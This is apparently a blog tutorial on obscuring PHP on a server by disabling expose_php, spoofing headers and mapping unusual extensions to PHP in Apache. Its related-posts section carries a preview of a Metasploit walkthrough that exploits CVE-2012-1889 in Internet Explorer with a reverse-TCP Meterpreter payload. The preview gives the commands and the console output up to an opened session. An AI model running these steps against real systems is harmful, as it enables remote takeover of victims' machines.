I must say that hiding or obfuscating is not the most effective ways of
security but it’s still effective to keep a Script Kiddy confused about
what actually you are using in your server.
As an example - Server may use vulnerable version of PHP, with a public
exploit released at some underground markets, Most of the time a simple
automated exploit is released to help the “Point-Click-Hackers” (Script
Kiddies). Now all they have to find is which Version of PHP you are
using and if it is vulnerable, Point the exploit, launch it and own your
system. In these cases obfuscating can really help you a lot.
By PHP obfuscation you can hide PHP, Which means you can stop or slow down a hacker attacking your machine.
In this tutorial, we’ll be looking at some of the most popular methods
used by Site Administrators to Hide PHP , So let’s get started.
Editing php.ini file
PHP as a default exposes the fact that if it is installed on a server or
not, by adding its signature to the Web server header which can really
be lethal in some cases.
To set this off , Simply go to your php installation directory under
“conf_files” , you can find your standard PHP Configuration file named
“php.ini”
Now under this file , go to the “Miscellaneous” section and simply turn expose_php to Off.
Spoofing
By adding a simple line of code you can actually fool an attacker about what service are you using.
Spoof.php
Note: The header call should be made before you send any data to the client.
Using Some Basic Apache Rules
Most Web servers like Apache etc. Can be configured to use some basic
rules that would allow to parse different file-types with PHP.
EG:-
A file like index.php, gives a straight clue to the attacker that the
server is using php. But if we can use some basic server configuration
to actually allow a extension like “.mpl” etc to parse PHP code. The
attacker will certainly have no clue about the file extension.
For the Scope of this tutorial I’ll only be covering some Apache
Rules/Configurations, but if you need help with some other servers, feel
free to comment or PM me.
The configurations can be added either using the .htaccess directive or
directly through the Apache Configurations file. Just add the following
set of rules
Syntax :-
Code:
AddType application/x-httpd-php .extenstion
Example :-
Code:
AddType application/x-httpd-php .mpl .mp3 .py .asp
Note : Only use those extensions which are normally not used by
the server , for example don’t use .txt extension as the server will
interpret .txt as PHP code and if it contains some php , it will be
executed.
Conclusion
Obfuscation is not the most effective way of security and at most of the
times, it doesn’t help, as a professional hacker would already know
these modifications and can easily make out what you are trying to hide.
But obfuscation would really slow down the attacker and will keep away
some script kiddies. It is better to obfuscate than rather telling him
what he wants.
Related Posts
192.168.56.12:1565) Type "sessions" to list the active sessions . Type "sessions -i 1", this will open the connection to the session with the id '1' and bring you to Meterpreter. Type "sysinfo" in the meterpreter to get the system information." href="http://elit-hackers.blogspot.com/2012/07/cve-2012-1889-microsoft-xml-core_30.html">CVE-2012-1889: Microsoft XML Core Services Vulnerability A vulnerability in Microsoft XML Core Services 3.0, 4.0, 5.0, and 6.0 allows remote code execution if a user views a specially crafted webpage using Internet Explorer. An attacker would have no way to force users to visit such a website. Instead, an attacker would have to convince users to visit the website, typically by getting them to click a link in an email message or Instant Messenger message that takes them to the attacker's website. The vulnerability affects all supported releases of Microsoft Windows, and all supported editions of Microsoft Office 2003 and Microsoft Office 2007. Here you can the full list. The vulnerability exists when MSXML attempts to access an object in memory that has not been initialized, which may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the logged-on user. I am going to demonstrate how to use Metasploit tool for testing whether your network vulnerable or not. Open the Terminal and type "msfupdate" to get the latest metasploit modules. Once update is finished, then type "msfconsole". Then type the following command in the console "use exploit/windows/browser/msxml_get_definition_code_exec". Now we have to know the list of settings available for this exploit module. In order to get the list , you can type "show options" in the console. Command: set SRVHOST 192.168.56.10 Details: Here the 192.168.56.11 is the ip of Backtrack . You can get this ip by simply typing the "ifconfig" in the terminal. Command: set lhost 192.168.56.10 Command: set URIPATH / Details: The path in which our exploit will run. As usual, we can use Reverse Tcp payload for this attack also. So type the following command in the Metasploit console: set payload windows/meterpreter/reverse_tcp Type "exploit" in the console. Once the victim loads the URL in his IE browser, you will get the following message in your metasploit console: [*] msxml_get_definition_code_exec - Using msvcrt ROP [*] msxml_get_definition_code_exec - 10.0.1.79:1564 - Sending html [*] Sending stage (752128 bytes) to 192.168.56.12 [*] Meterpreter session 1 opened (192.168.56.10:4444 -> 192.168.56.12:1565) Type "sessions" to list the active sessions . Type "sessions -i 1", this will open the connection to the session with the id '1' and bring you to Meterpreter. Type "sysinfo" in the meterpreter to get the system information.
Please try to comment if i have done well or if you have finished learning from the blog
EmoticonEmoticon